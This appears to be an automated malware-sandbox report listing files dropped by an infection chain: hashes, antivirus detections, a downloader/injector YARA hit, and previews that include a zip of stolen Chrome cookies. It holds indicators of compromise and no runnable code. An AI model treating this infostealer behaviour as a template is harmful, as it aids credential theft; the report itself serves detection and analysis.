SHA-512:	D70905196A6C3D3EF3AC8D6A234C94733CE513D127A3B9EDF141FA8267D90D811DBADC4A6ACA5F135A3E71F21881007E422C8616A577327C00AA6B8D30064FA0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87% Antivirus: Virustotal, Detection: 79%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y9e.........."...0..0..8........P... ...`....@.. ....................................@.................................>P..J....`..,............................P............................................... ............... ..H............text....0... ...2.................. ..`.rsrc...,....`.......4..............@..@.reloc...............8..............@..@................nP......H............x......&...................................................PK............................PK..PK....PK......PK....i).......t.....................4......(.............................................8...3.t.NN.N.H...WVGCJAP]V..N.H....AVZUZG]VWzG]VARC@]RAgll[...HH...................P.........m..Z) @.......%bo........Y..........Es.r..h+1$.h?$......Mo............._S5as......M-........&......[..................................a.P........rz.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\8F82.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\8F82.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	5.348913383944632
Encrypted:	false
SSDEEP:	24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoZsXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTH0HNpv
MD5:	71FD5D5B9DD7018C54AD58232F2F24EF
SHA1:	885A7C1A162548FEA5219ADB3FD1A95811D9EFE0
SHA-256:	09230BEA4C9D375A87B2BD831AECBC6C70DE8C7840FA16224636DD4A61C2BAD7
SHA-512:	7E9805F4140CE72BF1FE429387CC7C0E4E8207F6C0EEF3376A766E33A73C2789071B6CF2807F045933D7760C5EA650AAFAD107D3B2C0253896E7A1B494EC4C8A
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Managemen

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\932079.exe.log

Download File

Process:	C:\Users\user\AppData\Local\932079.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1584
Entropy (8bit):	5.365751861143134
Encrypted:	false
SSDEEP:	48:MpicJHKQwYHKGSI6oa1qHGIs0HKCtHTHhAHKKkhHNpv:SqbYqGSI6oawmj0qCtzHeqKkhtpv
MD5:	EB2297E4D02C47CB4FE57F844D498FC3
SHA1:	A9034FD326A64C70BCD67FAB245D0DB7AE864081
SHA-256:	3769F8656A583DCF0A66FF2BD6CA3A8578708F5065123906006605BD98B3E3B6
SHA-512:	B6E202E13AD299A2ADC4B87A45F9D94ECDD71B50651EDA16236A77F1010445C01CF011E5B09B2EE0DCB1403732D6BDD5EC766468D858323C12D5AECE2AC52BCE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"netstandard, Version=2.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\D9EC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\D9EC.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1266
Entropy (8bit):	5.389050717097651
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNt1qE4GIs0E4KVE4kh:MxHKQwYHKGSI6oRAHKKkt1qHGIs0HKVC
MD5:	667DBA4A515B1B27F824C08E1354AAAC
SHA1:	951E1ED4F630C30A97115F4D1081074176ADE499
SHA-256:	9C8E4F087947DA2D105EF701A6D3321A481ED6CAF52081A1DE57D4BBCFAC96E6
SHA-512:	60A7C9D9CDB867C1E90A10FBAAEF1EBEB363014FB24220748C3AD52C908FB661F39FD1959AC535305ACA05795B17A5F8D5D753E5EE3D9D73CB19F5873D9288BE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IdentityReference.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1266
Entropy (8bit):	5.389050717097651
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNt1qE4GIs0E4KVE4kh:MxHKQwYHKGSI6oRAHKKkt1qHGIs0HKVC
MD5:	667DBA4A515B1B27F824C08E1354AAAC
SHA1:	951E1ED4F630C30A97115F4D1081074176ADE499
SHA-256:	9C8E4F087947DA2D105EF701A6D3321A481ED6CAF52081A1DE57D4BBCFAC96E6
SHA-512:	60A7C9D9CDB867C1E90A10FBAAEF1EBEB363014FB24220748C3AD52C908FB661F39FD1959AC535305ACA05795B17A5F8D5D753E5EE3D9D73CB19F5873D9288BE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\39D.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\39D.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6rR8iy1.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.36509199858051
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAv
MD5:	3C63E66D9AEEF8DBC085D1459854EE3E
SHA1:	770A084649B3A7D9CB0CF1A5B922FE2AC9D59122
SHA-256:	06DF1E84C6419E6B0752C1CFD1B9D51A5D3EC1BC44513B5C1EB7400FA18760C4
SHA-512:	8626E48E0854AC46C4024F00A6FF170EFE896C06D2E37022FE6F757FBD933EEE00E97D977F5B13CA5A41822651E32469B152778B04296657E0B4F19DEF18F103
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7FE0.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\7FE0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	3FD5C0634443FB2EF2796B9636159CB6
SHA1:	366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
SHA-256:	58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
SHA-512:	8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jsc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Reputation:	unknown
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	106000
Entropy (8bit):	4.021679346213977
Encrypted:	false
SSDEEP:	768:N6FioFKjdk5G8fvwUcjk0O6Pq9+Se8zGNmLmDcJzy4JxzHkR1vIoVYsizmEDypX/:/JkFnLOe91z7NfphMiNG7nU1FY+KPZnt
MD5:	B9D29A5BC7BBD4122DEC8F8F83DBDD13
SHA1:	9EBECA8F343A57A18FE353996AC2F5C8396D2178
SHA-256:	80B81DDE5A4081E6F5F9F51F016194D946C9823B5FC10AA2D60E258D73552A8E
SHA-512:	8F6C3C45FDB6EC74B1B27019306145AF64A5EE5E61208A1DA98CDB94723AE4004C5BE90A5E9519602CAB9417337D3A236196FBE9CAE9DD386436A2515C9B2F84
Malicious:	false
Reputation:	unknown
Preview:	....h... ..............P..............Y...8...^...p...................W.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Temp\08dcd2e0-ca82-4524-9a17-e202d5562c47

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\08dcd2e0-ca82-4524-9a17-e202d5562c47-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\14WanQKs3vhmG6FVVdfe3LxB4OvE7kTR.zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	5546
Entropy (8bit):	7.895449694449351
Encrypted:	false
SSDEEP:	96:JWGzqeAoMq+YK0KF8cAJiI2i+uHXqS2/bJzwJpdzSXYilmgZccBFt:9qASpF8wFgaSObJzoWYi5BFt
MD5:	C3A413A897ACCE166E612C603491EE65
SHA1:	9930A1756F0EE9F9D808F68B939BFCC47EEE5ADA
SHA-256:	7514F96D7C3B1381E5940DDC6FABFA6A44A97E9231DE5BB1D51F0BED6003A43E
SHA-512:	9AC34E1AEAF6F20276DD99B3179261D8B7EE000BC8834613B770F0D653B7E0FB178FB1A13CE5F6FB84224F77556CEC0931D3BD081CCF439D77C801A430338722
Malicious:	false
Reputation:	unknown
Preview:	PK........MPrW................Cookies\..PK........MPrWQn.+............Cookies\Chrome_Default.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E..l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3Ap.U5UX....Z.g:e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d\|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O\|.....>K......L...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u\|....v...3.;L..U?..b.....u....... .......F...P.a...\|R3.=......r.:.64...#D..^..>.A..ZT.]E........t...f...1..3.....`...X.....C.]%...p.p.ym

C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\39D.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4357016
Entropy (8bit):	7.967527837816653
Encrypted:	false
SSDEEP:	98304:x1X44t3SGQ20KQ8fTQFYVjsb2ukZkh640j+5QlHf:PxbQ21QC5QrkWU40j+5QF
MD5:	194599419A04DD1020DA9F97050C58B4
SHA1:	CD9A27CBEA2C014D376DAA1993538DAC80968114
SHA-256:	37378D44454AB9CCF47CAB56881E5751A355D7B91013CAED8A97A7DE92B7DAFE
SHA-512:	551EBCC7BB27B9D8B162F13FF7FAD266572575FF41D52C211A1D6F7ADBB056EAB3EE8110ED208C5A6F9F5DEA5D1F7037DFE53FFBC2B2906BF6CC758093323E81
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67% Antivirus: Virustotal, Detection: 69%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...6t.c.................>@..ZH......Q.......P@...@...................................B.....................................XB@.d....................pB......P......................................p0..@............................................text...T<@......>@................. ..`.data...\iF..P@..>...B@.............@....rsrc.................@.............@..@.reloc...j...P...l....B.............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\39D.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	12832256
Entropy (8bit):	7.950693788834959
Encrypted:	false
SSDEEP:	196608:KHeGVSiUtWdoSAIunnM+DPLHOn12M5S0Q5g25SrJshEPEOreEjr:KHeiSRWdo5IundTHOnYgm5g2SsV0
MD5:	DCF08EB00B5C34D77A4C96DD3DA08422
SHA1:	3C14F079E1F2997585B5F9A16A592AD03AF71F19
SHA-256:	0889831E4C97E94979A7CBAFE87F3DCD3106F0BE34E85487055BD47DF1CA0A57
SHA-512:	4B7D8516A9D91DDDBDB13D531F4D3F67D20DB6C1FC4E3B0CADD60F7C6E174DEC3B1FB908BF98D41691FADFC845B7BAAF65C665D1FF3F76288100E3F4A67F5BE7
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\39D.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....We............................N.... ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H.......L................(..I............................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\616D.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	284160
Entropy (8bit):	6.4415424729086705
Encrypted:	false
